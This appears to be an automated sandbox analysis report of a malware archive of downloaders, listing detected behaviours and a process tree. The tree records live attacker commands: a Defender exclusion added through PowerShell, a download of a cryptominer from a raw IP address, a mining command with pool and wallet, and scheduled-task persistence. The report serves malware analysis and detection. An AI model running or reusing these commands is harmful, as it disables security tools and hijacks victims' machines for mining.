Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 164 sc.exe 4240 sc.exe 992 sc.exe 3220 sc.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x000400000001e5a6-375.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 26 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language uncrypted.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language H8hsp6zrMtJI2hC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SrbijaSetupHokej.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Hokej.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language .exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ghjaedjgaw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language njSilent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language uncrypted.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language microsoft-onedrive.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bootxr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language systempreter.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language H8hsp6zrMtJI2hC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SrbijaSetupHokej.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5536 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3176 netsh.exe 5956 cmd.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ghjaedjgaw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ghjaedjgaw.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3816 timeout.exe -
Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 468 WMIC.exe 3136 WMIC.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 2736 systeminfo.exe -
Modifies Control Panel 26 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Cursors\SizeNESW = "C:\\Windows\\cursors\\aero_nesw.cur" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Appearance\Current rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Accessibility\HighContrast\High Contrast Scheme rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Cursors\Arrow = "C:\\Windows\\cursors\\aero_arrow.cur" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\cursors\\aero_working.ani" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Cursors\No = "C:\\Windows\\cursors\\aero_unavail.cur" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Accessibility\HighContrast\Flags = "126" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Cursors\Help = "C:\\Windows\\cursors\\aero_helpsel.cur" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Cursors\SizeNS = "C:\\Windows\\cursors\\aero_ns.cur" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Cursors\UpArrow = "C:\\Windows\\cursors\\aero_up.cur" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Cursors\Scheme Source = "2" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Appearance\NewCurrent rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Cursors\Wait = "C:\\Windows\\cursors\\aero_busy.ani" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Cursors\SizeWE = "C:\\Windows\\cursors\\aero_ew.cur" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Cursors\IBeam rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Cursors\SizeAll = "C:\\Windows\\cursors\\aero_move.cur" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Cursors\Hand = "C:\\Windows\\cursors\\aero_link.cur" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Cursors\NWPen = "C:\\Windows\\cursors\\aero_pen.cur" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Cursors\Crosshair rundll32.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Appearance rundll32.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Accessibility\HighContrast rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Accessibility\HighContrast\Previous High Contrast Scheme MUI Value rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Desktop\UserPreferencesMask = 9e1e078012000000 rundll32.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Cursors rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Cursors\SizeNWSE = "C:\\Windows\\cursors\\aero_nwse.cur" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Cursors\ = "Windows Default" rundll32.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings taskmgr.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5536 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2816 schtasks.exe 3036 schtasks.exe 4644 schtasks.exe 5472 schtasks.exe 3616 schtasks.exe 5616 schtasks.exe 2640 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 376 .exe 376 .exe 376 .exe 5004 taskmgr.exe 5004 taskmgr.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 4468 ghjaedjgaw.exe 4468 ghjaedjgaw.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 376 .exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 4 IoCs
pid Process 2344 7zFM.exe 5004 taskmgr.exe 3300 H8hsp6zrMtJI2hC.exe 5320 svchost.exe -
Suspicious behavior: MapViewOfSection 6 IoCs
pid Process 5188 uncrypted.exe 5188 uncrypted.exe 5188 uncrypted.exe 6108 explorer.exe 6108 explorer.exe 6108 explorer.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 2344 7zFM.exe Token: 35 2344 7zFM.exe Token: SeSecurityPrivilege 2344 7zFM.exe Token: SeRestorePrivilege 3688 7zG.exe Token: 35 3688 7zG.exe Token: SeSecurityPrivilege 3688 7zG.exe Token: SeSecurityPrivilege 3688 7zG.exe Token: SeRestorePrivilege 224 7zG.exe Token: 35 224 7zG.exe Token: SeSecurityPrivilege 224 7zG.exe Token: SeSecurityPrivilege 224 7zG.exe Token: SeDebugPrivilege 2828 New Text Document mod.exe Token: SeDebugPrivilege 1408 4363463463464363463463463.exe Token: SeDebugPrivilege 5004 taskmgr.exe Token: SeSystemProfilePrivilege 5004 taskmgr.exe Token: SeCreateGlobalPrivilege 5004 taskmgr.exe Token: SeDebugPrivilege 2824 powershell.exe Token: SeDebugPrivilege 376 .exe Token: SeDebugPrivilege 1184 diskutil.exe Token: SeDebugPrivilege 2052 diskutil.exe Token: SeDebugPrivilege 3168 powershell.exe Token: SeDebugPrivilege 3192 systempreter.exe Token: SeDebugPrivilege 3896 H8hsp6zrMtJI2hC.exe Token: SeDebugPrivilege 4424 powershell.exe Token: SeDebugPrivilege 2188 powershell.exe Token: SeLockMemoryPrivilege 3080 xmrig.exe Token: SeLockMemoryPrivilege 3080 xmrig.exe Token: SeDebugPrivilege 2852 msedge..exe Token: SeDebugPrivilege 5268 tasklist.exe Token: SeIncreaseQuotaPrivilege 5416 WMIC.exe Token: SeSecurityPrivilege 5416 WMIC.exe Token: SeTakeOwnershipPrivilege 5416 WMIC.exe Token: SeLoadDriverPrivilege 5416 WMIC.exe Token: SeSystemProfilePrivilege 5416 WMIC.exe Token: SeSystemtimePrivilege 5416 WMIC.exe Token: SeProfSingleProcessPrivilege 5416 WMIC.exe Token: SeIncBasePriorityPrivilege 5416 WMIC.exe Token: SeCreatePagefilePrivilege 5416 WMIC.exe Token: SeBackupPrivilege 5416 WMIC.exe Token: SeRestorePrivilege 5416 WMIC.exe Token: SeShutdownPrivilege 5416 WMIC.exe Token: SeDebugPrivilege 5416 WMIC.exe Token: SeSystemEnvironmentPrivilege 5416 WMIC.exe Token: SeRemoteShutdownPrivilege 5416 WMIC.exe Token: SeUndockPrivilege 5416 WMIC.exe Token: SeManageVolumePrivilege 5416 WMIC.exe Token: 33 5416 WMIC.exe Token: 34 5416 WMIC.exe Token: 35 5416 WMIC.exe Token: 36 5416 WMIC.exe Token: SeDebugPrivilege 5460 powershell.exe Token: SeDebugPrivilege 5448 powershell.exe Token: SeIncreaseQuotaPrivilege 5416 WMIC.exe Token: SeSecurityPrivilege 5416 WMIC.exe Token: SeTakeOwnershipPrivilege 5416 WMIC.exe Token: SeLoadDriverPrivilege 5416 WMIC.exe Token: SeSystemProfilePrivilege 5416 WMIC.exe Token: SeSystemtimePrivilege 5416 WMIC.exe Token: SeProfSingleProcessPrivilege 5416 WMIC.exe Token: SeIncBasePriorityPrivilege 5416 WMIC.exe Token: SeCreatePagefilePrivilege 5416 WMIC.exe Token: SeBackupPrivilege 5416 WMIC.exe Token: SeRestorePrivilege 5416 WMIC.exe Token: SeShutdownPrivilege 5416 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2344 7zFM.exe 2344 7zFM.exe 3688 7zG.exe 224 7zG.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 3080 xmrig.exe 5004 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe 5004 taskmgr.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 376 .exe 2052 diskutil.exe 3300 H8hsp6zrMtJI2hC.exe 3300 H8hsp6zrMtJI2hC.exe 1388 stub.exe 3576 stub.exe 3980 diskutil.exe 2852 msedge..exe 5460 SrbijaSetupHokej.exe 5272 SrbijaSetupHokej.tmp 1000 Hokej.exe 1000 Hokej.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2828 wrote to memory of 228 2828 New Text Document mod.exe 117 PID 2828 wrote to memory of 228 2828 New Text Document mod.exe 117 PID 2828 wrote to memory of 1492 2828 New Text Document mod.exe 119 PID 2828 wrote to memory of 1492 2828 New Text Document mod.exe 119 PID 2828 wrote to memory of 1492 2828 New Text Document mod.exe 119 PID 1492 wrote to memory of 988 1492 Bootxr.exe 120 PID 1492 wrote to memory of 988 1492 Bootxr.exe 120 PID 1492 wrote to memory of 988 1492 Bootxr.exe 120 PID 988 wrote to memory of 2824 988 cmd.exe 122 PID 988 wrote to memory of 2824 988 cmd.exe 122 PID 988 wrote to memory of 2824 988 cmd.exe 122 PID 2828 wrote to memory of 376 2828 New Text Document mod.exe 123 PID 2828 wrote to memory of 376 2828 New Text Document mod.exe 123 PID 2828 wrote to memory of 376 2828 New Text Document mod.exe 123 PID 2828 wrote to memory of 1184 2828 New Text Document mod.exe 124 PID 2828 wrote to memory of 1184 2828 New Text Document mod.exe 124 PID 2828 wrote to memory of 3192 2828 New Text Document mod.exe 125 PID 2828 wrote to memory of 3192 2828 New Text Document mod.exe 125 PID 2828 wrote to memory of 3192 2828 New Text Document mod.exe 125 PID 2828 wrote to memory of 4468 2828 New Text Document mod.exe 126 PID 2828 wrote to memory of 4468 2828 New Text Document mod.exe 126 PID 2828 wrote to memory of 4468 2828 New Text Document mod.exe 126 PID 1184 wrote to memory of 2640 1184 diskutil.exe 127 PID 1184 wrote to memory of 2640 1184 diskutil.exe 127 PID 1184 wrote to memory of 2052 1184 diskutil.exe 129 PID 1184 wrote to memory of 2052 1184 diskutil.exe 129 PID 2052 wrote to memory of 2816 2052 diskutil.exe 130 PID 2052 wrote to memory of 2816 2052 diskutil.exe 130 PID 1492 wrote to memory of 4632 1492 Bootxr.exe 132 PID 1492 wrote to memory of 4632 1492 Bootxr.exe 132 PID 1492 wrote to memory of 4632 1492 Bootxr.exe 132 PID 4632 wrote to memory of 3168 4632 cmd.exe 134 PID 4632 wrote to memory of 3168 4632 cmd.exe 134 PID 4632 wrote to memory of 3168 4632 cmd.exe 134 PID 1408 wrote to memory of 3896 1408 4363463463464363463463463.exe 136 PID 1408 wrote to memory of 3896 1408 4363463463464363463463463.exe 136 PID 1408 wrote to memory of 3896 1408 4363463463464363463463463.exe 136 PID 4468 wrote to memory of 3008 4468 ghjaedjgaw.exe 137 PID 4468 wrote to memory of 3008 4468 ghjaedjgaw.exe 137 PID 4468 wrote to memory of 3008 4468 ghjaedjgaw.exe 137 PID 3008 wrote to memory of 3816 3008 cmd.exe 139 PID 3008 wrote to memory of 3816 3008 cmd.exe 139 PID 3008 wrote to memory of 3816 3008 cmd.exe 139 PID 3896 wrote to memory of 4424 3896 H8hsp6zrMtJI2hC.exe 140 PID 3896 wrote to memory of 4424 3896 H8hsp6zrMtJI2hC.exe 140 PID 3896 wrote to memory of 4424 3896 H8hsp6zrMtJI2hC.exe 140 PID 3896 wrote to memory of 2188 3896 H8hsp6zrMtJI2hC.exe 142 PID 3896 wrote to memory of 2188 3896 H8hsp6zrMtJI2hC.exe 142 PID 3896 wrote to memory of 2188 3896 H8hsp6zrMtJI2hC.exe 142 PID 3896 wrote to memory of 3036 3896 H8hsp6zrMtJI2hC.exe 144 PID 3896 wrote to memory of 3036 3896 H8hsp6zrMtJI2hC.exe 144 PID 3896 wrote to memory of 3036 3896 H8hsp6zrMtJI2hC.exe 144 PID 3896 wrote to memory of 3300 3896 H8hsp6zrMtJI2hC.exe 146 PID 3896 wrote to memory of 3300 3896 H8hsp6zrMtJI2hC.exe 146 PID 3896 wrote to memory of 3300 3896 H8hsp6zrMtJI2hC.exe 146 PID 3896 wrote to memory of 3300 3896 H8hsp6zrMtJI2hC.exe 146 PID 3896 wrote to memory of 3300 3896 H8hsp6zrMtJI2hC.exe 146 PID 3896 wrote to memory of 3300 3896 H8hsp6zrMtJI2hC.exe 146 PID 3896 wrote to memory of 3300 3896 H8hsp6zrMtJI2hC.exe 146 PID 3896 wrote to memory of 3300 3896 H8hsp6zrMtJI2hC.exe 146 PID 3896 wrote to memory of 3300 3896 H8hsp6zrMtJI2hC.exe 146 PID 3896 wrote to memory of 3300 3896 H8hsp6zrMtJI2hC.exe 146 PID 1492 wrote to memory of 3080 1492 Bootxr.exe 147 PID 1492 wrote to memory of 3080 1492 Bootxr.exe 147 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 6060 attrib.exe 5472 attrib.exe
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\241127-xqsswsslej_pw_infected.zip"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2344
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService1⤵PID:4456
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1068
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\themecpl.dll,OpenThemeAction C:\Windows\Resources\Themes\Light.theme1⤵
- Modifies Control Panel
PID:388
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\" -spe -an -ai#7zMap8602:140:7zEvent41351⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3688
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\*\" -spe -an -ai#7zMap2673:384:7zEvent27591⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:224
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\xmrig.exe"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\xmrig.exe"2⤵
- Executes dropped EXE
PID:228
-
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Bootxr.exe"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Bootxr.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\SysWOW64\cmd.execmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:988 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2824
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c powershell Invoke-WebRequest -Uri http://45.125.67.168/stelin/xmrig.exe -Outfile C:\WinXRAR\xmrig.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest -Uri http://45.125.67.168/stelin/xmrig.exe -Outfile C:\WinXRAR\xmrig.exe4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3168
-
-
-
C:\WinXRAR\xmrig.exeC:\WinXRAR\xmrig.exe -o xmr-us-east1.nanopool.org:14444 -u 47n193Tag3FHULdsD1HYmYGPdfCpquhdci1Rq2L4gR4U5Diq8oX6ny73xRqb4DwWYBTuQQF3Xa36AQFNjCCX71nAMeYiG4t -p x --algo rx/03⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3080
-
-
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\.exe"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:376
-
-
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\diskutil.exe"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\diskutil.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1184 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "diskutil" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:2640
-
-
C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe"C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "diskutil" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:2816
-
-
